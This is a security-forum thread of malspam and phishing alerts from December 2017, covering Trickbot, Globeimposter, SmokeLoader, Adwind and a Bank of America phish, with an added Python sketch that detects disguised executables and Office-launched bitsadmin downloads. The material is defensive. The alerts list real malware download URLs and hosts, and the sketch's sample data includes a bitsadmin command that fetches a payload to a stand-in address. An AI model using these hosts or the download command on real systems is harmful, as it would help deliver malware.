
Thread: SPAM frauds, fakes, and other MALWARE deliveries...

  1. #1311
    AplusWebMaster (Adviser Team)
    Join Date: Oct 2005
    Location: USA
    Posts: 6,878

    Fake 'account documents' SPAM

    FYI...

    Fake 'account documents' SPAM - delivers Trickbot
    - https://myonlinesecurity.co.uk/trick...-form-malspam/
    7 Dec 2017 - "... an email containing the subject of 'Your account documents' pretending to come from Companies House but actually coming from a look-a-like or typo-squatted domain <no-reply@ companieshouseform .co.uk> with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...ecure-form.png

    SecureForm84.doc - Current Virus total detections 3/60*| Hybrid Analysis**... This malware docx file downloads from
    http ://aperhu .com/ser0712.png which of course is -not- an image file but a renamed .exe file that gets renamed to Ejjmdejh9.exe (VirusTotal 8/68[3])...
    The alternative download location is
    http ://altarek .com/ser0712.png... Today’s example of the spoofed domain is, as usual, registered via Godaddy as registrar using privacy protection services...
    companieshouseform .co.uk hosted on numerous servers and IP addresses and sending the emails via 185.207.204.218 | 185.23.215.76 | 89.39.106.208 | All of which are based in Netherlands...
    Malware detail:
    > https://myonlinesecurity.co.uk/wp-co...m_word_doc.png
    DO NOT follow the advice they give to enable macros or enable editing to see the content..."
    * https://www.virustotal.com/en/file/2...is/1512651253/
    SecureForm6.doc

    ** https://www.hybrid-analysis.com/samp...ironmentId=100


    3] https://www.virustotal.com/en/file/b...is/1512647520/
    fbwnk.exe

    aperhu .com: 143.95.252.46: https://www.virustotal.com/en/ip-add...6/information/
    > https://www.virustotal.com/en/url/8a...01d0/analysis/

    altarek .com: 64.50.184.217: https://www.virustotal.com/en/ip-add...7/information/
    > https://www.virustotal.com/en/url/c1...50bb/analysis/

    Last edited by AplusWebMaster; 2017-12-07 at 16:34.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  2. #1312
    AplusWebMaster (Adviser Team)

    Fake 'Amazon invoice' SPAM

    FYI...

    Fake 'Amazon invoice' SPAM - delivers Trickbot
    - https://myonlinesecurity.co.uk/fake-...necurs-botnet/
    12 Dec 2017 - "... Necurs botnet has changed again today...
    Update: I am informed that this is definitely Trickbot banking trojan, not ransomware, although several antiviruses are detecting it as a ransomware version. An email with the subject of 'Invoice RE-2017-12-12-00572' (random numbers after the date) pretending to come from Amazon Marketplace <lqftdwbmxYYfT@ marketplace.amazon .com> (random characters before the @) with a malicious word doc attachment...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...arketplace.png

    RE-2017-12-12-00572.doc - Current Virus total detections 12/59*. Hybrid Analysis**...
    This malware downloads from
    http ://ragazzemessenger .com/nyRhdkwSD which gave ejmaryj8.exe (VirusTotal 9/67[3]) (Hybrid Analysis[4])...
    There will be loads of other download sites... DO NOT follow the advice they give to enable macros or enable editing to see the content..."
    * https://www.virustotal.com/en/file/8...is/1513080354/
    RE-2017-12-12-00775.doc

    ** https://www.hybrid-analysis.com/samp...ironmentId=100


    3] https://www.virustotal.com/en/file/2...is/1513080273/

    4] https://www.hybrid-analysis.com/samp...ironmentId=100

    ragazzemessenger .com: 98.124.251.168: https://www.virustotal.com/en/ip-add...8/information/
    > https://www.virustotal.com/en/url/a8...4c38/analysis/


  3. #1313
    AplusWebMaster (Adviser Team)

    Fake 'Scan' SPAM, Fake FBI phish, AIM discontinued

    FYI...

    Fake 'Scan' SPAM - delivers Globeimposter ransomware
    - https://myonlinesecurity.co.uk/anoth...are-but-fails/
    15 Dec 2017 - "... Necurs botnet has messed up again today... an email with the subject of 'Scan' pretending to come from random names and email addresses... It is trivially easy to decode the base64 section, create the 7z file & extract the vbs to get the Globeimposter ransomware they are attempting to deliver. Over the last few weeks we have seen this behaviour several times. Sometimes with 7z or zip files. Sometimes with word docs...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...5_08-02-13.png

    Scan_00057.7z: - Extracts to: Scan_005287.vbs - Current Virus total detections 7/60*. Hybrid Analysis**...
    This particular version downloads from
    http ://peopleiknow .org/JKHhgdf72? - there will be several other locations in -other- vbs files...
    The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/8...is/1513324220/
    Scan_005287.vbs

    ** https://www.hybrid-analysis.com/samp...ironmentId=100

    peopleiknow .org: 67.210.102.240: https://www.virustotal.com/en/ip-add...0/information/
    > https://www.virustotal.com/en/url/1e...3e61/analysis/
    ___

    Fake FBI phish - leads to Tech Support Scam
    - https://myonlinesecurity.co.uk/fake-...-support-scam/
    14 Dec 2017 - "... It pretends to be a message from the FBI saying you might be a victim of cyber crime and you should ring the phone number in the email. The phone number belongs to a dubious Tech Support service:
    globalphonesupport .com: 69.89.31.186: https://www.virustotal.com/en/ip-add...6/information/

    If you are unwise enough to ring the number you will be falsely told that there is something wrong with your computer. 'It needs cleaning'... and it will cost you at least one hundred USD to repair.
    It is highly likely that these scammers will ask you to install a 'remote access program' (although they call it something else)...
    Unusually there is no link in this email. [Some] of these scams will have a link that leads to a page saying your computer is infected with Zeus trojan or similar that locks-the-browser and displays the phone number to ring...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...pport-Scam.png

    " ... RE: Case: 8755174734
    The IP address registered on your name was referred to our ICC Center multiple times as being a possible victim of cyber crime.
    We believe that your IP address and other identifying information were used to commit several computer fraud and abuse crimes. This investigation covers the time period from August 7, 2017 to the present date.
    We appreciate your instant assistance to this matter. Please contact us urgently with all of the information concerning this case, at telephone number listed below...
    "

    These emails use Social engineering tricks to persuade you to open the attachments, follow links or ring the phone number in the email...
    ___

    AIM - discontinued on Dec 15, 2017
    - https://help.aol.com/articles/aim-discontinued
    "As of December 15, 2017, AOL Instant Messenger products and services will be shut down and will no longer work.
    If you are an AOL member, AOL products and services like AOL Mail, AOL Desktop Gold and Member Subscriptions will not be affected. To view your benefits, please visit: https://mybenefits.aol.com/ "

    Last edited by AplusWebMaster; 2017-12-15 at 18:09.

  4. #1314
    AplusWebMaster (Adviser Team)

    Fake 'Website Job Application' SPAM, Office - malware delivery platform

    FYI...

    Fake 'Website Job Application' SPAM - delivers malware
    - https://myonlinesecurity.co.uk/more-...erent-malware/
    20 Dec 2017 - "... This is a continuation from these 3 previous posts about malware using resumes or job applications as the lure [1] [2] [3]... The primary change in delivery method is the use of a password for the word doc to try to bypass antivirus filters... Today’s version continues to SmokeLoader/Sharik trojan which is a downloader for -other- malware. An email with the subject of 'Website Job Application' coming from Rob Meyers <Gong@ latestmistake .com> (probably random names) with a malicious word doc attachment delivers SmokeLoader/ sharik trojan...
    1] https://myonlinesecurity.co.uk/websi...be-ransomware/
    2] https://myonlinesecurity.co.uk/spear...ds-to-malware/
    3] https://myonlinesecurity.co.uk/fake-...liver-malware/

    Screenshot: https://myonlinesecurity.co.uk/wp-co...sume_eml-1.png

    Rob Resume.doc - Current Virus total detections 11/59*. Hybrid Analysis**... It should be noted that this malicious word doc and the downloaded malware either has some sort of anti-analysis protection or the malware delivery site will reject connections from known sandboxes, VM analysis tools and known researcher or antivirus IP addresses. Neither of the 2 Online sandboxes / analysis tools could retrieve the downloaded malware. That had to be done manually. They have continued with the previous behaviour of using BITS (bitsadmin.exe) to download the file instead of PowerShell. They also are still using “autoclose” in the macro so it doesn’t run until the word doc has been closed, so avoiding any obvious signs of infiltration. Also the downloaded file sleeps for a long, long time before doing anything. This malware downloads from
    http ://80.82.67.217/paddle.jpg which of course is -not- an image file but a renamed .exe (ASxas.exe)
    VirusTotal 8/67[4]. Hybrid Analysis[5]... HA shows a further download of a bitcoin miner (VirusTotal 43/66[6])
    but Anyrun could not get anything despite leaving it running for 10 minutes...
    This word doc looks like this:
    > https://myonlinesecurity.co.uk/wp-co...sume_1_doc.png
    And after you input the password from the email body (123456) you see a typical page asking you to enable editing and then macros and content:
    > https://myonlinesecurity.co.uk/wp-co...sume_2_doc.png
    ... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/d...is/1513715092/
    Resume.doc

    ** https://www.hybrid-analysis.com/samp...ironmentId=100

    4] https://www.virustotal.com/en/file/f...is/1513716371/
    paddle.jpg.exe

    5] https://www.hybrid-analysis.com/samp...ironmentId=100


    6] https://www.virustotal.com/en/file/9...d51c/analysis/
    bitcoinminer1

    80.82.67.217: https://www.virustotal.com/en/ip-add...7/information/
    > https://www.virustotal.com/en/url/f4...cbe9/analysis/
    ___

    Office as a malware delivery platform: DDE, Scriptlets, Macro obfuscation
    ... Powerful behind-the-scenes features in Office have suddenly stepped back into the malware limelight, with an onslaught of mostly macro-less attacks starring jimmied Word, Excel and PowerPoint documents
    > https://www.computerworld.com/articl...fuscation.html
    Dec 19, 2017 - "... Some clever researchers have found new and unexpected ways to get Word, Excel and PowerPoint documents to deliver all sorts of malware — ransomware, snoopers, even a newly discovered credential stealer that specializes in gathering usernames and passwords. In many cases, these new uses employ methods as old as the hills. But the old warning signs don’t work as well as they once did..."
    (Much more detail at the computerworld URL above.)

    ADV170021 | Microsoft Office Defense in Depth Update
    - https://portal.msrc.microsoft.com/en...sory/ADV170021
    12/12/2017 - "... provides enhanced security as a defense-in-depth measure. The update disables the Dynamic Update Exchange protocol (DDE) in all supported editions of Microsoft Word..." - Also:
    > https://docs.microsoft.com/en-us/sec...s/2017/4053440
    Updated: Dec 12, 2017

    >> https://www.askwoody.com/forums/topi...n/#post-153388
    Dec 20, 2017

    Last edited by AplusWebMaster; 2017-12-20 at 16:22.
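
    Added example (not part of the original posts or of the quoted write-ups): two delivery traits described in posts #1311 and #1314, a payload served with an image extension that is really a Windows executable and a Word macro chain that launches bitsadmin.exe to fetch it, written as defensive checks in Python. The process-event field names (`pid`, `ppid`, `image`, `command_line`), the sample events and the sample bytes are constructed for illustration.

```python
"""Added detection sketch; field names and sample data are constructed."""
import ntpath
import os
import re
from urllib.parse import urlsplit

IMAGE_MAGIC = {  # leading bytes of genuine image files
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def is_pe(data: bytes) -> bool:
    """True when data starts with an MZ header that points at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    pe_offset = int.from_bytes(data[0x3C:0x40], "little")
    return data[pe_offset:pe_offset + 4] == b"PE\x00\x00"


def classify_download(name: str, data: bytes) -> str:
    """Compare a downloaded file's extension with what its bytes really are."""
    ext = os.path.splitext(name.lower())[1]
    if ext not in IMAGE_MAGIC:
        return "not-image"
    if is_pe(data):
        return "executable-disguised-as-image"
    if data.startswith(IMAGE_MAGIC[ext]):
        return "ok"
    return "mismatch"


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def office_ancestor(event, by_pid, max_depth=5):
    """Walk parent links (macro -> cmd.exe -> bitsadmin.exe) to an Office app."""
    cur, seen = event, {event["pid"]}
    for _ in range(max_depth):
        parent = by_pid.get(cur["ppid"])
        if parent is None or parent["pid"] in seen:
            return None
        if _base(parent["image"]) in OFFICE_APPS:
            return _base(parent["image"])
        seen.add(parent["pid"])
        cur = parent
    return None


def bits_download_alerts(events):
    """Flag bitsadmin.exe download jobs and record why each looks suspicious."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if _base(e["image"]) != "bitsadmin.exe":
            continue
        cmd = e["command_line"]
        urls = URL_RE.findall(cmd)
        if not urls or not re.search(r"/(transfer|addfile)\b", cmd, re.I):
            continue
        reasons = ["bitsadmin download"]
        office = office_ancestor(e, by_pid)
        if office:
            reasons.append(f"launched under {office}")
        if urlsplit(urls[0]).path.lower().endswith(tuple(IMAGE_MAGIC)):
            reasons.append("image extension in URL")
        alerts.append({"pid": e["pid"], "url": urls[0], "reasons": reasons})
    return alerts


# Constructed sample data (203.0.113.0/24 is a documentation address range).
FAKE_PE = b"MZ" + b"\x00" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\x00\x00"
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "command_line": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "command_line": "WINWORD.EXE /n resume.doc"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\bitsadmin.exe",
     "command_line": r"bitsadmin /transfer job1 /download http://203.0.113.10/sample.jpg C:\Users\Public\s.exe"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\bitsadmin.exe",
     "command_line": "bitsadmin /list"},
]
```

    Because the macro usually starts an intermediate process, the check walks the parent chain instead of looking only at the direct parent of bitsadmin.exe.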

  5. #1315
    AplusWebMaster (Adviser Team)

    DoubleClick Ad XSS vuln, Cryptominers ...

    FYI...

    DoubleClick Advertising network XSS vuln
    - https://myonlinesecurity.co.uk/doubl...vulnerability/
    21 Dec 2017 - "Just a quick alert about an email from Google warning of vulnerabilities in some DoubleClick publishers. This has been sent to all website owners who use DoubleClick in any form. However this will ONLY affect website owners who use DoubleClick as a stand alone service to display adverts. It does not affect website owners who use Google AdSense to display adverts and have enabled the additional options to also use DoubleClick as a method of advertising in the allowed advertisers section of your Google AdSense settings page:
    > https://myonlinesecurity.co.uk/wp-co..._XSS_alert.png
    The email reads:
    'Dear Customer,
    We’ve identified certain vendor files that may contain XSS vulnerabilities which could pose a security risk. Please check if you are hosting these files and remove them with the help of your webmaster. These are the currently identified third-party vendor files...'"
    (More detail at the myonlinesecurity URL above.)

    > https://support.google.com/dfp_premium/answer/7622991
    ___

    Cryptominers...
    - https://umbrella.cisco.com/blog/2017...mining-mayhem/
    Dec 19, 2017 - "As cryptocurrencies continue to increase in value, cryptomining becomes increasingly more lucrative. With Bitcoin nearly reaching $18,000USD/1BTC, speculation that other cryptocurrencies such as Ethereum and Monero may hit this mark eventually is rising. Monero is especially interesting given that one of its primary advantages is the relatively low processing power needed to mine it. Given that it is capable of being mined even by consumer grade computers, many organizations have tried to capitalize on this facet of the currency.
    > https://s3-us-west-1.amazonaws.com/u...eOfTheCoin.png
    Launched in September of this year, Coinhive is a service that has transformed the internet already in its short life. 'Coinhive' allows users to embed JavaScript API calls to enable anonymous mining of Monero cryptocurrency in browsers. 'Monero' aims to improve on existing cryptocurrency design by obscuring the sender, recipient and amount of every transaction made, as well as making the mining process more egalitarian by lowering processing costs. Though Coinhive as an organization has said they want users to come up with new uses for their service, it’s hard to imagine they wanted users to create apps that then go on to be abused...
    It’s impossible to say with accuracy where the future will take cryptocurrencies or cryptominers, but they’re almost certainly here to stay. As the internet continues to evolve in its third decade of existence, enterprising individuals will always be looking for the next motherlode, taking advantage of a landscape that others can’t see."
    (More detail at the umbrella.cisco URL above.)

    Last edited by AplusWebMaster; 2017-12-21 at 17:49.

  6. #1316
    AplusWebMaster (Adviser Team)

    Fake 'Outstanding Statement' SPAM

    FYI...

    Fake 'Outstanding Statement' SPAM - delivers ransomware
    - https://myonlinesecurity.co.uk/fake-...er-ransomware/
    22 Dec 2017 - "... malware downloaders from the Necurs botnet... an email with the subject of 'Outstanding Statement' pretending to come from Prime Express Oldham <sales62@ primeexpressuk .com> (random numbers after sales) delivering Globeimposter ransomware...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...2_11-48-59.png

    Customer Statement (122017_6816162).7z: Extracts to: Customer Statement (122017_51767638).js
    Current Virus total detections 16/55*. Hybrid Analysis**...
    This js file downloads from
    http ://www.upperlensmagazine .com/tOldHSYW??DVTCGAtym=DVTCGAtym (VirusTotal 11/68[3]). As usual there will be 6 or 8 other download sites... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/7...is/1480616575/
    -6dt874p53077.js

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    45.126.209.154
    Contacted Hosts
    45.126.209.154

    3] https://www.virustotal.com/en/file/d...is/1513941343/
    GWMadFzby2.exe

    upperlensmagazine .com: 45.126.209.154: https://www.virustotal.com/en/ip-add...4/information/
    > https://www.virustotal.com/en/url/3d...ae1b/analysis/


  7. #1317
    AplusWebMaster (Adviser Team)

    Fake 'UPS Invoice' SPAM

    FYI... Bah Humbug! ...

    Fake 'UPS Invoice' SPAM - delivers Java Adwind
    - https://myonlinesecurity.co.uk/fake-...a-jrat-trojan/
    24 Dec 2017

    Screenshot: https://myonlinesecurity.co.uk/wp-co...PS_Invoice.png

    INVOICE.zip: extracts to INVOICEE.jar (533kb) - Current Virus total detections 14/61* | Hybrid Analysis**...

    "... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."

    * https://www.virustotal.com/en/file/f...is/1514092872/
    INVOICEE.jar

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    185.171.25.4
    Contacted Hosts
    46.246.120.179
    92.122.154.56



  8. #1318
    AplusWebMaster (Adviser Team)

    Fake blank/empty SPAM, WordPress Brute Force Attacks

    FYI...

    Fake blank/empty SPAM - delivers globeimposter ransomware
    - https://myonlinesecurity.co.uk/more-...er-ransomware/
    26 Dec 2017 - "... malware downloaders from the Necurs botnet... a blank/empty email with the subject of 'CCE26122017_004385' (random numbers after the date) pretending to come from random names and random email addresses that just has a 7z attachment containing a .js file... One of the emails looks like:
    From: Emmitt <Emmitt@ kendrixcorp .com>
    Date: Tue 26/12/2017 15:04
    Subject: CCE26122017_004385
    Attachment: CCE26122017_004385.7z

    Body content: completely blank/empty

    Screenshot: https://myonlinesecurity.co.uk/wp-co...6_15-28-28.png

    CCE26122017_004385.7z: Extracts to: CCE26122017_48779.js - Current Virus total detections 11/58*. Hybrid Analysis**...
    This particular version downloads from
    http ://www.thedournalist .com/mnbTREkfDS??jYAbcsB=jYAbcsB (there will normally be 6-8 other download locations)
    (VirusTotal 7/68[3])...
    The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/1...is/1514301126/
    CCE26122017_48779.js

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    86.106.30.37
    Contacted Hosts
    86.106.30.37

    3] https://www.virustotal.com/en/file/3...is/1514301538/
    mnbTREkfDS.exe

    thedournalist .com: 86.106.30.37: https://www.virustotal.com/en/ip-add...7/information/
    ___

    Massive Brute-Force Attack Infects WordPress Sites with Monero Miners
    - https://www.bleepingcomputer.com/new...monero-miners/
    Dec 20, 2017 - "... WordPress sites around the globe have been the targets of a massive brute-force campaign during which hackers attempted to guess admin account logins in order to install a Monero miner on compromised sites...
    Once attackers get in, they install a Monero miner, and they also use the infected site to carry out further brute-force attacks. These two operations don't happen at the same time, and each site is either brute-forcing other WordPress sites or mining Monero..."

    WordPress Brute Force Attack Campaign
    - https://www.wordfence.com/blog/2017/...rdpress-attack
    Dec 18, 2017 - "A massive distributed brute force attack campaign targeting WordPress sites started this morning at 3am Universal Time, 7pm Pacific Time. The attack is broad in that it uses a large number of attacking IPs, and is also deep in that each IP is generating a huge number of attacks. This is the most aggressive campaign we have seen to date, peaking at over 14 million attacks per hour. The attack campaign was so severe that we had to scale up our logging infrastructure to cope with the volume when it kicked off, which makes it clear that this is the highest volume attack that we have seen in Wordfence history, since 2012..."
    ___

    Remove the Slmgr32.exe Monero CPU Miner
    - https://www.bleepingcomputer.com/vir...nero-cpu-miner
    Nov 3, 2017

    Last edited by AplusWebMaster; 2017-12-26 at 22:16.

  9. #1319
    AplusWebMaster (Adviser Team)

    Fake 'Scan' SPAM, Apple 'Batterygate'

    FYI...

    Fake 'Scan' SPAM - Necurs botnet traffic
    - https://myonlinesecurity.co.uk/freak...er-ransomware/
    29 Dec 2017 - "... Necurs botnet... several hundred I have received in the last hour have been quarantined on my mail server. The next in the never ending series of malware downloaders is an email with the subject of 'Scan' pretending to come from random names and email address. The name in the email body matches the alleged sender...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...9_10-17-04.png

    Scan_0041.7z: Extracts to: -6dt874p53077.js - Current Virus total detections 14/59*. Hybrid Analysis**...
    This particular js has these 3 urls embedded in it (there will be dozens of other Urls that download the payload in different js files). It uses the first url & only moves to the next if the first does not respond
    (VirusTotal 9/66[3])...
    http ://damynghedunglinh .com/YoepHGds?
    http ://3dpvietnam .com/YoepHGds?
    http ://emergency-help .com.au/YoepHGds? ...
    The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/1...is/1514542049/
    Scan_005416.js

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    198.143.137.42
    Contacted Hosts
    198.143.137.42

    3] https://www.virustotal.com/en/file/1...is/1514542104/
    YoepHGds.exe

    damynghedunglinh .com: 198.143.137.42: https://www.virustotal.com/en/ip-add...2/information/
    > https://www.virustotal.com/en/url/1d...a43c/analysis/
    ___

    Apple 'Batterygate'
    >> https://www.cnbc.com/2017/12/28/appl...full-text.html
    Dec 29, 2017 - 14 Hours Ago
    "Apple apologizes for iPhone slowdowns and offers $29 battery replacements..."
    Video 1:55
    >> https://www.reuters.com/article/us-a...-idUSKBN1EM20N
    Dec 28, 2017 - "... Apple Inc (AAPL.O) is slashing prices for battery replacements and will change its software to show users whether their phone battery is good..."

    > https://www.apple.com/iphone-battery-and-performance/
    Dec 28, 2017 - "A Message to Our Customers about iPhone Batteries and Performance...
    Apple is reducing the price of an out-of-warranty iPhone battery replacement by $50 — from $79 to $29 — for anyone with an iPhone 6 or later whose battery needs to be replaced, starting in late January and available worldwide through December 2018. Details will be provided soon on apple.com.
    Early in 2018, we will issue an iOS software update with new features that give users more visibility into the health of their iPhone’s battery, so they can see for themselves if its condition is affecting performance..."

    Last edited by AplusWebMaster; 2017-12-29 at 14:31.

  10. #1320
    AplusWebMaster (Adviser Team)

    BoA - phish

    FYI...

    BoA - phish
    - https://myonlinesecurity.co.uk/bank-...lert-phishing/
    17 Jan 2017 - ".... an aggressive phishing campaign against Bank of America arriving overnight UK time. They all pretend to come from Bank of America < BankofAmerica@ customerloyalty.accounts.com > but are actually coming from various servers. I have posted details of 2 that I received. The emails are identical apart from the subject line. There will almost certainly be other similar subjects that I haven’t seen yet.
    The subjects I have seen so far are:
    Bank of America Alert Sign-in to Online Banking Locked
    Bank of America Alert: Unlock Your Account Important Message From Bank Of America ®

    Screenshot: https://myonlinesecurity.co.uk/wp-co...7_04-18-51.png

    The link in the email http ://www .valaskabela .sk/new .php -redirects- you to:
    http ://bankofamerica-com-update-work-new2018.hbdhshjdsjkds .co.uk/d983474dae569d3bdffe8735ae43151a/ (random ID /referral string after the co.uk/)...

    hbdhshjdsjkds .co.uk: 162.241.225.135: https://www.virustotal.com/en/ip-add...5/information/
    > https://www.virustotal.com/en/url/1e...a003/analysis/

    accounts .com: 204.14.52.151: https://www.virustotal.com/en/ip-add...1/information/
    > https://www.virustotal.com/en/url/d7...c1df/analysis/

    Screenshot2: https://myonlinesecurity.co.uk/wp-co...7_04-18-01.png

    All of these emails use Social engineering tricks to persuade you to open-the-attachments that come with the email..."

